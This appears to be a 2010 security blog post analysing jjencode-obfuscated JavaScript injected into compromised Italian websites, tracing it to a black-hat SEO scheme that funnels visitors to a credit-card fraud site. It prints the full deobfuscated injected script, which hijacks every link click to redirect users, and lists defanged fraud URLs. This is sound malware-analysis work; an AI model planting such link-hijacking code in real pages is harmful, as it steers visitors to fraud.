Tuesday, October 5, 2010

dollars javascript code – yet another Javascript obfuscation method for cc frauds

January 25,  2011 – Update:
a detailed analysis also where is reported my post:
Internet  Explorer exSploit Milk codes
http://utf-8.jp/public/20101106/avtokyo.pptx


October 5, 2010:

From MDL forum, I get a post where a user (many thanks to Edgar) has been reported a strange Javascript code injected in some Italian web site. Specifically the message is located at the following URL:
 http://www.malwaredomainlist.com/forums/index.php?topic=4354.0
The code that is reported looks like shown in the following screenshot:
dollarscode001

At first lookup appears like a nonsense code for who is not a Javascript guru like me. So I decide to try to decode this very interesting code for try to know what this code do.  The first step it’s been try to use some Javascript alert() function call in the prologue code. So  the first lines of code are been modified as following:
dollarscode002
The blue pills shown the place where the alert() has been placed. Trying to execute this abstract of code the alert call sequence has generated these results:
dollarscode003
dollarscode004
dollarscode005
dollarscode006
dollarscode007
The rest of code deobfuscation is obtained placing within a textarea the code referenced by “Function()” as follow:
dollarscode008
also the end of obfuscated code must be modified as shown:
dollarscode009
Once this modified code is placed in a test HTML page and rendered by Firefox, it’s been obtained this deobfuscated jquery code:
page_links = [];
        function setGlobalOnLoad(f) {
           var root = window.addEventListener || window.attachEvent ? window : document.addEventListener ? document : null
           if (root){
              if(root.addEventListener) root.addEventListener("load", f, false)
              else if(root.attachEvent) root.attachEvent("onload", f)
           } else {
              if(typeof window.onload == 'function') {
                 var existing = window.onload
                 window.onload = function() {
                    existing()
                    f()
                 }
              } else {
                 window.onload = f
              }
           }
        }
        function addHandler(object, event, handler) {
          if (typeof object.addEventListener != 'undefined')
            object.addEventListener(event, handler, false);
          else if (typeof object.attachEvent != 'undefined')
            object.attachEvent('on' + event, handler);
        }

        if (window.navigator.userAgent.match(/gtb/i) || window.navigator.userAgent.match(/chrome/i) || document.referrer!='' || document.referrer.indexOf (document.domain)==-1) {
            var right_browser='yes';
            }else     var right_browser='no';

        function getCookie(c_name)
        {
        if (document.cookie.length>0)
          {
          c_start=document.cookie.indexOf(c_name + "=");
          if (c_start!=-1)
            {
            c_start=c_start + c_name.length+1;
            c_end=document.cookie.indexOf(";",c_start);
            if (c_end==-1) c_end=document.cookie.length;
            return unescape(document.cookie.substring(c_start,c_end));
            }
          }
        return "";
        }
        var c_index = Math.floor(Math.random() * 5);       
        var fcoo=getCookie('c_first');       
        var exdate=new Date();
        exdate.setDate(exdate.getDate()+365);
        document.cookie='c_first'+ "=" +escape('false')+";expires="+exdate.toUTCString();
        if (c_index==4 && fcoo!='false' && right_browser=='yes') {
            setGlobalOnLoad(function() {
            var block = document.getElementById('mlk');
            var links = block.getElementsByTagName('A');
            for (var i = 0; i < links.length; i++) {
                page_links.push(links[i].href);
            }
            var links = document.links;
            for (var i = 0; i < links.length; i++) {
                addHandler(links[i], "click", function(event) {
                    var index = Math.floor(Math.random() * (page_links.length - 1));
                    event.target.href = page_links[index];
                });
            }
        });
Update: the code it’s been obuscated using the following encoding script:
http://utf-8.jp/public/jjencode.html  (Mowab thank you very much for your support).
The obtained code, at first sight seems a loader of the href object injected in the compromised web page (as shown along). Also the bolded line of code:
var block = document.getElementById('mlk');
is the object assignment which contain the link to the malicious HTML page injected within the compromised hosts. In particular all server listed and reported by the MDL post seems reference URL like these:
dollarscode010
The HTML page injected lead to a to a black listed site as credit card fraud. In this case the compromised host analyzed is bisteccheriadabaffo.it. Calling , for example,
bisteccheriadabaffo.it/modules/com_easycaptcha/desert-highlands-golf-p-699.html
is retrieved this page:
dollarscode011
Clicking on one of the download buttons appear a CAPTCHA request as following:
dollarscode012
Clicking on download button is called the following URL:
hzzzzp://turbo-speed-downloads.com/download.php?file=1506495%20Cranberry%20Highlands%20Golf%20Course%20gsm%20userschoise%2097%20302.rar

Following the download sequence appear a message that entice the user to signup for download the desired file:

dollarscode014
Trying to sign up, is shown a fake promotional message like this:
dollarscode015
The checkout action try to contact this website
hxxxxps://purchase.shopeasydeals.com/
that is black listed for credit card frauds as noticed by MyWOT  response
http://www.mywot.com/en/scorecard/purchase.shopeasydeals.com
dollarscode016
I think that the compromised hosts , as reported at the begin of this post, have been implicated for a Black Hat Seo infrastructure with the goal of enticing users to download stuff from a credit card fraud web site.

3 comments:

  1. Probably, that code is generated by jjencode, I wrote.
    http://utf-8.jp/public/jjencode.html

    I feel a sharp regret about abuse of jjencode.

    --
    HASEGAWA Yosuke
    http://utf-8.jp/

    ReplyDelete
  2. kudos to yosuke hasegawa

    ReplyDelete
  3. mowab thank you very much for your support.

    ReplyDelete